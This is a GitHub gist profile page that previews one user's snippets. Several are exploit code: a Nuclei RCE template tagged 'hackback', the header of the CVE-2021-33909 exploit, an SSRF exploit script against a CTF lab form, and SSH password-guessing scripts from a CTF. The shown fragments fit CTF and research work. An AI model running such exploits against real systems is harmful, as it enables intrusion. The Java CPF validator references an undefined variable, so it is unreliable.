Skip to content

Instantly share code, notes, and snippets.

Avatar
:shipit:
>:)

Celesian c3l3si4n

:shipit:
>:)
View GitHub Profile
@c3l3si4n
c3l3si4n / nuclei-rce.yaml
Last active Sep 25, 2021
POC demonstrating RCE on Nuclei v2.5.1. The following PoC will execute `touch /tmp/rce_on_nuclei`. JS exploit based on CVE-2021-21224 PoCs
View nuclei-rce.yaml
id: nuclei-rce
info:
name: Nuclei Template RCE by Chromium
author: c3l3si4n
severity: critical
tags: rce,hackback
headless:
- steps:
@c3l3si4n
c3l3si4n / sequoia.c
Created Jul 21, 2021
gcc sequoia.c -o exploit; chmod +x exploit; ./exploit
View sequoia.c
/*
* CVE-2021-33909: size_t-to-int vulnerability in Linux's filesystem layer
* Copyright (C) 2021 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
@c3l3si4n
c3l3si4n / ssrf.py
Created Oct 19, 2020
Ultimate Hacker Championship 17° Finals - Exploit Script
View ssrf.py
import requests
import string
import base64
def attempt(payload):
data = {"contactName":"aa","contactEmail":"aa@a.com","website": payload,"contactMessage": "A" * 40}
r = requests.post('https://uhclabs.labdepentest.com.br/inc/sendEmail.php', data=data)
output = r.text
if 'went wrong.' in output:
print("error")
@c3l3si4n
c3l3si4n / two_set_of_credentials.py
Created Aug 9, 2020
Two Set of Credentials exploit script for SpiderLabsCTF2020
View two_set_of_credentials.py
import paramiko
import sys
import string
import datetime
def test_password(password):
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
@c3l3si4n
c3l3si4n / Remote_IoT_Service_SpiderLabs_2020.py
Last active Aug 9, 2020
Remote IoT Service @ SpiderLabsCTF 2020 writeup
View Remote_IoT_Service_SpiderLabs_2020.py
"""
First part: Leaking password
"""
import paramiko
from time import sleep
import sys
from pwn import p64
def test_password(password):
@c3l3si4n
c3l3si4n / cpf.java
Last active Mar 22, 2020
Java - algoritmo de verificação de cpf | cpf verification and validation algorithm
View cpf.java
public class Cpf {
private static final int[] cpfWeight = {11, 10, 9, 8, 7, 6, 5, 4, 3, 2}; // pesos do cpf, para uso no algoritmo de digito verificador
private static int calculateVerifierDigit(String input, int[] weight) { // funcao de digito verificador, recebe a mensagem a ser verificada e seu peso
int sum = 0; // declaracao da soma
for (int i = input.length() - 1, digit; i >= 0; i--) {
digit = Integer.parseInt(input.substring(i, i + 1)); // itera por cada digito do input
sum += digit * weight[weight.length - input.length() + index]; // 10 - 11 + index
}
sum = 11 - sum % 11; // pega o "módulo 11" da soma
return sum > 9 ? 0 : sum; // se a soma for 10, retornar 0.
View customerRepository.java
@Repository
public interface customerRepository extends JpaRepository<Customer, Long>{
}
View productsRepository.java
@Repository
public interface productsRepository extends JpaRepository<Products, Long>{
}
View products.java
@Entity
public class Products {
@Id
@GeneratedValue(strategy=GenerationType.AUTO)
private Long id;
private String name;
@Unique
private String nickname;
private BigDecimal price;
View customer.java
@Entity
public class Customer {
@Id
@GeneratedValue(strategy=GenerationType.AUTO)
private Long id;
private String firstName;
private String lastName;
@Unique
private String identityNumber;